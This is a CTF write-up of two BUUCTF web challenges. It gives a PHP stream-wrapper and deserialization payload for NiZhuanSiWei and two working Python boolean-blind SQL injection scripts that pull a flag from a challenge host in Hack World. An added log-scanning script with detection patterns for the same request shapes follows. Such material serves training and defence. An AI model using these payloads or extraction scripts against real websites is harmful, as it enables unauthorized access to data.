BUUCTF Summary
NiZhuanSiWei
The home page is a piece of PHP code; auditing it:

It calls file_get_contents(), so a PHP stream wrapper (pseudo-protocol) can be used to supply the string 'welcome to the zjctf' and pass the check.
The hint also mentions useless.php, and include() can be used to read that file.
Construct the payload:
?text=data:text/plain,welcome%20to%20the%20zjctf&file=php://filter/read=convert.base64-encode/resource=useless.php
This returns the base64-encoded source:

Decode it and audit:
```php
<?php
class Flag{
    //flag.php
    public $file;
    public function __tostring(){
        if(isset($this->file)){
            echo file_get_contents($this->file);
            echo "<br>";
            return ("U R SO CLOSE !///COME ON PLZ");
        }
    }
}
?>
```
Build the serialized object:
```php
<?php
$a = new Flag();
$a->file = 'flag.php';
echo serialize($a);
```
The final payload:
?text=data:text/plain,welcome%20to%20the%20zjctf&file=useless.php&password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}
The result is in the page source.

Hack World

From some quick testing and the title description, the goal is to read the flag column of the flag table. The page never returns data, only a true/false judgment, so boolean-based blind injection is the way in.
There is filtering, so fuzz first:

The filtered characters have little effect, so just write a script (my own first; it is painfully slow):
```python
import requests

url = "http://4bdb6890-2aed-4cc5-8d6f-e0c6621b6fa8.node3.buuoj.cn/index.php"
flag = ''
# For each position, try every printable ASCII value in turn.
for i in range(1, 50):
    for j in range(41, 126):
        payload = {
            "id": '(ascii(substr((select(flag)from(flag)),%d,1))=%d)' % (i, j)}
        output = requests.post(url=url, data=payload)
        # The page says "Hello" only when the condition is true.
        if "Hello" in output.text:
            flag += chr(j)
            break
    print(flag)
```
Binary search is much faster:
```python
import requests
import time

url = "http://4bdb6890-2aed-4cc5-8d6f-e0c6621b6fa8.node3.buuoj.cn/index.php"
temp = {
    "id": ""}
flag = ""
for i in range(1, 1000):
    time.sleep(0.06)
    low = 32
    high = 128
    mid = (low + high) // 2
    # Narrow the range with "greater than" comparisons until it collapses to one value.
    while (low < high):
        temp["id"] = "(ascii(substr((select(flag)from(flag)),%d,1))>%d)" % (i, mid)
        r = requests.post(url, data=temp)
        print(low, high, mid, ":")
        if "Hello" in r.text:
            low = mid + 1
        else:
            high = mid
        mid = (low + high) // 2
    # No printable character found: we have run past the end of the flag.
    if (mid == 32 or mid == 127):
        break
    flag += chr(mid)
    print(flag)
print("flag=", flag)
```
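Seen from the other side of both challenges, each of these requests leaves a recognisable shape in a request log: stream wrappers fed to file_get_contents()/include(), a serialized object in a parameter, and a burst of ascii(substr(...)) comparisons from one client. The following detection script is an added example, not part of the original writeup; the log format and the lines in SAMPLE_LOG are constructed for it.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Constructed sample of a proxy/WAF log recording "<client> <method> <target>"
# with query or form parameters appended. These lines are made up for this
# example and mirror the request shapes used in the two challenges above.
SAMPLE_LOG = """\
10.0.0.5 GET /index.php?text=data:text/plain,welcome%20to%20the%20zjctf&file=php://filter/read=convert.base64-encode/resource=useless.php
10.0.0.5 GET /index.php?text=data:text/plain,welcome&file=useless.php&password=O:4:%22Flag%22:1:{s:4:%22file%22;s:8:%22flag.php%22;}
10.0.0.9 POST /index.php?id=(ascii(substr((select(flag)from(flag)),1,1))>80)
10.0.0.9 POST /index.php?id=(ascii(substr((select(flag)from(flag)),1,1))>104)
10.0.0.9 POST /index.php?id=(ascii(substr((select(flag)from(flag)),1,1))>92)
10.0.0.7 GET /index.php?id=1
"""

# One rule per technique from the writeup: PHP stream wrappers, a serialized
# PHP object arriving in a parameter, and the per-character comparison that
# drives boolean blind injection.
RULES = {
    "php_stream_wrapper": re.compile(r"\b(?:php|phar|data)://|\bdata:[a-z]+/[a-z]+[;,]", re.I),
    "serialized_object": re.compile(r'\bO:\d+:"[A-Za-z_]\w*":\d+:\{'),
    "blind_sqli_probe": re.compile(r"ascii\s*\(\s*substr\s*\(", re.I),
}


def decode_request(line):
    """Split a log line and URL-decode the target so encoded quotes become visible."""
    client, method, target = line.split(" ", 2)
    return client, method, unquote(target)


def scan_log(text, probe_threshold=3):
    """Return (per-line rule hits, clients with >= probe_threshold blind probes).

    A single ascii(substr(...)) request is noise; a run of them from one
    client is the signature of an extraction loop like the scripts above.
    """
    hits, probes = [], Counter()
    for raw in text.splitlines():
        if not raw.strip():
            continue
        client, _method, target = decode_request(raw)
        matched = [name for name, rx in RULES.items() if rx.search(target)]
        if matched:
            hits.append((client, matched))
        if "blind_sqli_probe" in matched:
            probes[client] += 1
    suspects = sorted(c for c, n in probes.items() if n >= probe_threshold)
    return hits, suspects
```

Run `scan_log(SAMPLE_LOG)` to see the two wrapper/deserialization requests flagged individually and 10.0.0.9 reported as a blind-injection suspect after its third probe.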

This article summarizes several CTF challenges, including the PHP deserialization vulnerability in NiZhuanSiWei, boolean blind injection in Hack World, SSRF in Fakebook, error-based injection in hardsql, UNION queries in Baby Sqli, code execution in areuserialz, SQL injection in BlackList, file reading in easy java, command injection in Online Tool, and various puzzle-solving techniques.